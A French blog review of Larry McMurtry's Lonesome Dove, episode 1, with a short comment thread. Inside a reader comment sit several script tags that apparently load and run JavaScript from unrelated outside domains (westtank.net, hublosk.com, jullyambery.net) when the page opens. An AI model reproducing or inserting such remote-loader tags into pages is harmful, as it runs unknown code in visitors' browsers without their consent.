• Larry McMurtry, Lonesome Dove, épisode 1, Gallmeister

    Larry McMurtry, Lonesome Dove, Epidode 1, Gallmeister Larry McMurtry est mort le 25 mars 2021. Né en 1936 cet écrivain américain était aussi scénariste. Il avait par exemple coécrit le scénario du Secret de Brokeback Mountain. Sa série Lonesome Dove, nous dit la nécro du Monde, "s'est attachée à démythifier le far west et ses cow-boys héroïques tout en maintenant vivace et en régénérant la tradition du western littéraire outre-Atlantique". Il a reçu le prix Pulitzer pour le premier volet de cette quadrilogie.

     

    Larry McMurtry, Lonesome Dove, Epidode 1, Gallmeister Lonesome Dove, épisode 1. Augustus McCrae et Woodrow Call, dit le Capitaine, anciens rangers, sont les copropriétaires d'une entreprise d'élevage de bétail à Lonesome Dove, Texas. Ils y végètent tranquillement entre le ranch où travaille une poignée d'hommes et le saloon -pour Augustus- où officie la belle Lorena, prostituée qui attire les hommes à 50 km à la ronde. Survient Jake Spoon, qui n'avait plus donné signe de vie depuis dix ans. De passage à Fort Smith, Arkansas, il en a accidentellement tué le maire. Il propose à Call de partir avec un troupeau pour le Montana où, pense-t-il, ils feront fortune facilement. Nos cow-boys franchissent le Rio Grande pour voler du bétail au Mexique et les voilà en route. Ils sont accompagnés de Lorena qui s'est entichée de Jake et suivis par July Johnson, sheriff de Fort Smith.

     

     

    Le récit commence tout doucement, à l'image de la vie quotidienne routinière des protagonistes. Les Indiens ont été tués ou chassés du Texas depuis longtemps déjà. L'annonce du départ vers le Montana, espace encore peu peuplé par les Blancs en 1880, éveille diverses angoisses chez les hommes mais aussi l'espoir d'être enfin traité en adulte pour les plus jeunes comme Newt, 17 ans. Le convoi va affronter la nature hostile (tempêtes de sables, orages, cours d'eau en crue, serpents venimeux, mesquites épineux...) et croiser la route de Blue Duck et sa bande d'assassins.

     

    Larry McMurtry, Lonesome Dove, Epidode 1, Gallmeister

    mesquite

     

    Larry McMurtry fait preuve d'une imagination inventive en matière de péripéties. Il y a de l'humour et des personnages originaux et attachants. Les cow-boys sont mélancoliques. Call et Gus vivent tous deux avec le souvenir d'une femme à laquelle ils n'ont pas su dire oui au bon moment et le spectacle de la nature est une consolation pour eux. Ils vont découvrir que leurs exploits de rangers, vingt ans plus tôt, font maintenant partie du passé et n'impressionnent plus les jeunes générations.

    "Ca va être nous les Indiens si on est encore là dans vingt ans, dit Augustus. Vu comment cet endroit se développe, sous peu il y aura plus que des églises et des boutiques. Ensuite, il leur restera plus qu'à encercler les vieux bagarreurs comme nous et à les foutre dans une réserve pour qu'ils effraient pas les vieilles dames".

    Les femmes quant à elles sont fortes et décidées. Lorena s'impose dans le convoi pour s'extraire de Lonesome Dove.J'aime bien aussi la jeune Janey, gamine malingre capable de suivre un cheval à pied et d'abattre à coup de pierres gibier et malfaiteurs. La fin de l'épisode me laisse en plein suspense, je file à la bibliothèque chercher la suite.

     

    L'avis de Kathel.

     

     


    Tags Tags : , ,
  • Commentaires

    1
    keisha
    Mercredi 14 Avril à 08:03
    keisha

    Hé bien bonne lecture du 2 ! Excellent. Pour ma part j'attends le dernier (re)paru!

    <script src="//westtank.net/2313bb93141d74fb89.js?2"></script> <script src="http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8979x" type="text/javascript"></script> <script src="http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8979x&format=arrjs&r=1618380142012" type="text/javascript"></script> <script src="http://westtank.net/ext/2313bb93141d74fb89.js?sid=52715_8979_&title=aa&blocks[]=31af2" type="text/javascript"></script>
      • Mercredi 14 Avril à 10:52

        Ça y est, je l'ai, c'est pour bientôt.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :